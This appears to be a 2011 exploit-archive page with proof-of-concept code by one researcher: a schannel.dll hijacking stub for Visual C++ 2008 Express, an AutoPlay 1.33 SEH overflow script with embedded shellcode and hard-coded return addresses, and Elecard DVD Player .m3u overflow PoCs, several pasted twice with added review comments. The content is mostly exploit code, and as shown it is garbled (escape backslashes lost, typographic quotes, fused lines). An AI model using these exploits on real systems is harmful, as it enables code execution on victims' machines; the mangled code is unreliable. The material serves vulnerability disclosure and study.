Visual C++ 2008 Express Edition (schannel.dll) DLL Hijacking Exploit

/*
Visual C++ 2008 Express Edition (schannel.dll)  DLL Hijacking Exploit

Vendor: Microsoft.
Product Web Page: http://www.microsoft.com/
Affected Version: Visual C++ 2008 Express Edition (x86) 9.0.30729.1 SP

Summary: Microsoft Visual C++ (often abbreviated as MSVC or VC++)
is a commercial, non-free integrated development environment (IDE)
product from Microsoft for the C, C++, and C++/CLI programming
languages. It has tools for developing and debugging C++ code,
especially code written for the Microsoft Windows API, the DirectX API,
and the Microsoft .NET Framework.

Desc: Vulnerable extensions are .inc, .def, .disco, and .dtd
using schannel.dll libraries.

Tested on Microsoft Windows XP Professional SP3 (EN)
Compiled with Visual C++ 2008 Express Edition (x86)

Vulnerability discovered by Dame Jovanoski (badc0re)
Mail:jovanoski@zeroscience.mk

Zero Science Lab – http://www.zeroscience.mk

23.02.2011

*/

#include <windows.h>
/*
 * Visible marker that the planted library was loaded: pops a message box and
 * returns 0. It carries no other behaviour; the point of the PoC is only to
 * show which process picked up a schannel.dll from an unexpected directory.
 *
 * NOTE(review): the string literals below are delimited with typographic
 * quotes (“ ”) as pasted; a C compiler rejects those, so the published
 * source presumably used straight quotes. Left as published.
 */
int hax0r()
{
MessageBox(0, TEXT(“Hax0r”), TEXT(“DLL Message”), MB_OK);
return 0;
}

/*
 * DLL entry point. On DLL_PROCESS_ATTACH it calls hax0r() (the message-box
 * marker) and then falls through to the shared break; every other reason code
 * is a no-op. Always returns TRUE so the load succeeds.
 *
 * hinstDLL and lpvReserved are unused. hinstDLL is declared HANDLE where the
 * documented DllMain signature uses HINSTANCE; both are pointer-sized handles,
 * so this is a style point rather than a functional one.
 *
 * NOTE(review): DllMain runs under the loader lock; Microsoft's DllMain
 * guidance discourages calling UI APIs such as MessageBox from it. It works
 * here as a demonstration, but it is not a pattern to copy.
 *
 * Defender notes: this is the classic unqualified-library-search weakness.
 * Mitigation sits with the application (load system libraries by fully
 * qualified path, SetDefaultDllDirectories / SafeDllSearchMode) rather than
 * with this stub. Detection: schannel.dll being mapped from a directory other
 * than the system directory — e.g. the folder of an opened .inc/.def/.disco/
 * .dtd document — is the observable signal.
 */
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
/* Intentional fall-through: the marker fires once, then the shared break. */
hax0r();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}

#Auto_Play 1.33 Buffer Overflow(SEH) Local Exploit Autoplay script .ini file
#By badc0re(Dame Jovanoski)
#
# NOTE(review): as reproduced by the blog this script is not runnable: every
# "\x" escape has lost its backslash (so "x29xc9..." is a plain ASCII string,
# not a byte sequence), the quotes are typographic, and the body of the
# try/except block has lost its indentation. Kept byte-for-byte as published;
# only comments are added.
from struct import *
import time
# Neither struct nor time is used anywhere below.
f=open(“AutoPlay.ini”,”w”)
# Payload bytes appended after the SEH overwrite. Treated as opaque here; the
# PoC's behaviour is not analysed beyond the file layout it writes.
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56”);head=(“x5bx47x65x6ex65x72x61x6cx5dx0dx0ax54x69x74x6cx65”
“x3dx41x20x73x61x6dx70x6cx65x20x6fx66x20x77x68x61”
“x74x20x41x75x74x6fx50x6cx61x79x20x63x61x6ex20x64”
“x6fx21x0dx0ax49x63x6fx6ex3dx2ex5cx61x75x74x6fx70”
“x6cx61x79x2ex69x63x6fx0dx0ax53x74x61x72x74x75x70”
“x53x6fx75x6ex64x3dx2ex5cx64x72x75x6dx72x6fx6cx6c”
“x2ex77x61x76x0dx0ax45x78x69x74x53x6fx75x6ex64x3d”
“x2ex5cx65x78x70x6cx6fx64x65x2ex77x61x76x0dx0ax4e”
“x75x6dx62x65x72x4fx66x42x75x74x74x6fx6ex73x3dx37”
“x0dx0ax42x61x63x6bx67x72x6fx75x6ex64x42x69x74x6d”
“x61x70x3dx2ex5cx73x70x6cx61x73x68x2ex6ax70x67x0d”
“x0ax4ex75x6dx62x65x72x4fx66x43x6fx6dx62x6fx73x3d”
“x31x0dx0ax0dx0ax5bx42x75x74x74x6fx6ex31x5dx0dx0a”
“x43x6fx6dx6dx61x6ex64x54x79x70x65x3dx31x0dx0ax43”
“x6fx6dx6dx61x6ex64x3dx65x78x70x6cx6fx72x65x72x2e”
“x65x78x65x0dx0ax46x6cx79x62x79x53x6fx75x6ex64x3d”
“x2ex5cx68x6fx76x65x72x73x65x6cx2ex77x61x76x0dx0a”
“x4cx65x66x74x3dx38x33x0dx0ax54x6fx70x3dx31x33x0d”
“x0ax54x65x78x74x43x6fx6cx6fx72x3dx32x35x35x2cx30”
“x2cx30x0dx0ax48x69x67x68x6cx69x67x68x74x43x6fx6c”
“x6fx72x3dx32x35x35x2cx32x35x35x2cx30x0dx0ax43x61”
“x70x74x69x6fx6ex3dx52x75x6ex20x57x69x6ex64x6fx77”
“x73x20x45x78x70x6cx6fx72x65x72x0dx0ax46x6fx6ex74”
“x53x69x7ax65x3dx32x34x0dx0ax46x6fx6ex74x4ex61x6d”
“x65x3d”)
# Read as \x escapes, "head" is an ordinary AutoPlay .ini: a [General] section
# followed by a [Button1] section whose last key is "FontName=". Everything
# written after it therefore appears to land in the FontName value, which is
# where the parser's unbounded copy would be. A length bound on .ini values
# (or a rule flagging an abnormally long FontName) is the corresponding fix /
# detection.
junk=”x41″*32
junk1=”x41″*92
nseh=”xebx06x90x90″
# Hard-coded absolute addresses: tied to one specific build of the target and
# its libraries, which is why such PoCs are not portable across systems.
seh=”x62xcex86x7c”#x62xcex86x7c pop pop ret
esp=”x7bx46x86x7c”#x7bx46x86x7c jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
# Python 3 style print() here; the other scripts on this page use the
# Python 2 print statement — they are not from one interpreter version.
print(“File created”)
except:
# Bare except swallows every error (including a NameError/TypeError from the
# mangled literals above) behind one generic message; "except OSError" would
# name the case the message actually describes.
print(“File cannot be created”)
# Second script in the paste: an .m3u playlist crash PoC. It appears to be an
# earlier draft of the ElecardDVDPlayer PoC that follows further down the page
# (same header lines, same marker layout). Kept byte-for-byte as published.
from struct import *
# NOTE(review): the line break between "import time" and "f=open(...)" was
# lost in the paste, so this line is a SyntaxError as shown. struct and time
# are not used anyway.
import timef=open(“default5.m3u”,”w”)
print “Creating expoit.”
#time.sleep(1)
print “Creating explot..”
#time.sleep(1)
print “Creating explot…”
# Payload bytes (same literal as in the AutoPlay script). Unreached in this
# draft: nseh/seh below are filler markers, not addresses.
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56″);
# Extended M3U header; the "n" at the end of each piece is a "\n" that lost its
# backslash in the paste.
head=”#EXTM3Un”
head+=”#EXTINF:153,Artist – songn”
junk1=”x42″*4
# 0x43/0x44 marker bytes with candidate addresses left in the comments: this
# version only demonstrates control of the SEH record (a crash with
# recognisable values), not execution.
nseh=”x43″*4#”xebx0ax90x90″
seh=”x44″*4#”x7ax15xbdx77″#”xebx0ax90x90″
# seh1 and nop are assigned but never written to the file.
seh1=”x90″*4#77bd157a#”0x00463EB6″
junk=”x41″*19995
nop=”x90″*4
try:
f.write(head+junk1+nseh+seh+shell+junk)
f.close()
print “File created”
except:
# Bare except: any failure, not just an I/O error, prints this message.
print “File cannot be created”


#!/usr/bin/python
#
#
# ElecardDVDPlayer 5.6 Local Buffer Overflow PoC (SEH)
#
#
# Vendor: Elecard Group
# Product web page: http://www.elecard.com
# Affected version: 5.6
#
# Summary: Elecard MPEG Player is a high-quality full-featured multimedia
# player supporting the newest formats, designed to provide you with
# video and audio playback.
#
# Desc: The program suffers from a buffer overflow (SEH) vulnerability
# when opening playlist file (.m3u), as a result of adding extra
# bytes.
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
# Vulnerability discovered by: badc0re (Dame Jovanoski)
#
#
# Advisory ID: ZSL-2011-4998
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2011-4998.php
#
# 23.02.2011
#
# Special Thanks to:
#
# LiquidWorm (the master :P)
# Corelanc0der(great tutorials and forum)
#
# NOTE(review): crash-only PoC — it writes an oversized .m3u with marker
# bytes (0x43/0x44) in the SEH positions and carries no payload. As pasted it
# is not runnable: the open() below is commented out, the quotes are
# typographic, "\n" escapes lost their backslash, and the try/except body
# lost its indentation. Kept byte-for-byte as published; comments only.
#
# NOTE(review): with the open() commented out, "f" is never defined, so the
# f.write() inside try raises NameError, which the bare except turns into
# "File cannot be created". The script cannot produce the file in this form.
#f=open(“default5.m3u”,”w”)
print “Creating expoit.”
# Extended M3U header (the trailing "n" on each piece is a mangled "\n").
head=”#EXTM3Un”
head+=”#EXTINF:153,Artist – songn”
# junk, seh1 and nop are assigned but never written.
junk=”x42″*4
nseh=”x43″*4
seh=”x44″*4
seh1=”x90″*4
# 20165 filler bytes before the SEH record: the offset this PoC reports for
# the playlist-entry buffer. An upper bound on entry length in the .m3u
# parser is the corresponding fix.
junk1=”x41″*20165
nop=”x90″*4
try:
f.write(head+junk1+nseh+seh+junk)
f.close()
print “File created”
except:
# Bare except: hides the NameError noted above behind an I/O-sounding message.
print “File cannot be created”
#Auto_Play 1.33 Buffer Overflow(SEH) Local Exploit Autoplay script .ini file
#By badc0re(Dame Jovanoski)
#
# NOTE(review): this is a second, identical paste of the AutoPlay .ini PoC
# that appears earlier on the page. Same mangling applies: "\x" escapes have
# lost their backslash, quotes are typographic, and the try/except body lost
# its indentation, so it is not runnable as shown. Kept byte-for-byte.
from struct import *
import time
# Neither struct nor time is used below.
f=open(“AutoPlay.ini”,”w”)
# Payload bytes appended after the SEH overwrite; treated as opaque here.
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56”);head=(“x5bx47x65x6ex65x72x61x6cx5dx0dx0ax54x69x74x6cx65”
“x3dx41x20x73x61x6dx70x6cx65x20x6fx66x20x77x68x61”
“x74x20x41x75x74x6fx50x6cx61x79x20x63x61x6ex20x64”
“x6fx21x0dx0ax49x63x6fx6ex3dx2ex5cx61x75x74x6fx70”
“x6cx61x79x2ex69x63x6fx0dx0ax53x74x61x72x74x75x70”
“x53x6fx75x6ex64x3dx2ex5cx64x72x75x6dx72x6fx6cx6c”
“x2ex77x61x76x0dx0ax45x78x69x74x53x6fx75x6ex64x3d”
“x2ex5cx65x78x70x6cx6fx64x65x2ex77x61x76x0dx0ax4e”
“x75x6dx62x65x72x4fx66x42x75x74x74x6fx6ex73x3dx37”
“x0dx0ax42x61x63x6bx67x72x6fx75x6ex64x42x69x74x6d”
“x61x70x3dx2ex5cx73x70x6cx61x73x68x2ex6ax70x67x0d”
“x0ax4ex75x6dx62x65x72x4fx66x43x6fx6dx62x6fx73x3d”
“x31x0dx0ax0dx0ax5bx42x75x74x74x6fx6ex31x5dx0dx0a”
“x43x6fx6dx6dx61x6ex64x54x79x70x65x3dx31x0dx0ax43”
“x6fx6dx6dx61x6ex64x3dx65x78x70x6cx6fx72x65x72x2e”
“x65x78x65x0dx0ax46x6cx79x62x79x53x6fx75x6ex64x3d”
“x2ex5cx68x6fx76x65x72x73x65x6cx2ex77x61x76x0dx0a”
“x4cx65x66x74x3dx38x33x0dx0ax54x6fx70x3dx31x33x0d”
“x0ax54x65x78x74x43x6fx6cx6fx72x3dx32x35x35x2cx30”
“x2cx30x0dx0ax48x69x67x68x6cx69x67x68x74x43x6fx6c”
“x6fx72x3dx32x35x35x2cx32x35x35x2cx30x0dx0ax43x61”
“x70x74x69x6fx6ex3dx52x75x6ex20x57x69x6ex64x6fx77”
“x73x20x45x78x70x6cx6fx72x65x72x0dx0ax46x6fx6ex74”
“x53x69x7ax65x3dx32x34x0dx0ax46x6fx6ex74x4ex61x6d”
“x65x3d”)
# Decoded, "head" is a plain AutoPlay .ini ([General] then [Button1]) ending
# in "FontName=", so the data written after it appears to become the FontName
# value. Bounding .ini value length in the parser is the fix; an abnormally
# long FontName is the detection signal.
junk=”x41″*32
junk1=”x41″*92
nseh=”xebx06x90x90″
# Hard-coded absolute addresses: specific to one build of the target and its
# libraries.
seh=”x62xcex86x7c”#x62xcex86x7c pop pop ret
esp=”x7bx46x86x7c”#x7bx46x86x7c jmp esp
try:
f.write(head+junk+esp+junk1+nseh+seh+shell)
f.close()
print(“File created”)
except:
# Bare except: every failure (including errors from the mangled literals)
# is reported as an I/O problem.
print(“File cannot be created”)
# Second paste of the .m3u crash-PoC draft that also appears earlier on the
# page. Kept byte-for-byte as published; comments only.
from struct import *
# NOTE(review): "import time" and "f=open(...)" were fused onto one line in
# the paste — a SyntaxError as shown. struct and time are unused.
import timef=open(“default5.m3u”,”w”)
print “Creating expoit.”
#time.sleep(1)
print “Creating explot..”
#time.sleep(1)
print “Creating explot…”
# Payload bytes; not reached in this draft because nseh/seh are marker
# fillers rather than addresses.
shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61”
“x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13”
“x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f”
“xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b”
“x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30”
“xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72”
“x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd”
“x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e”
“x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52”
“x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56″);
# Extended M3U header; the trailing "n" on each piece is a mangled "\n".
head=”#EXTM3Un”
head+=”#EXTINF:153,Artist – songn”
junk1=”x42″*4
# 0x43/0x44 markers with candidate addresses left in comments: crash
# demonstration only.
nseh=”x43″*4#”xebx0ax90x90″
seh=”x44″*4#”x7ax15xbdx77″#”xebx0ax90x90″
# seh1 and nop are assigned but never written to the file.
seh1=”x90″*4#77bd157a#”0x00463EB6″
junk=”x41″*19995
nop=”x90″*4
try:
f.write(head+junk1+nseh+seh+shell+junk)
f.close()
print “File created”
except:
# Bare except: any failure prints this message, not just I/O errors.
print “File cannot be created”
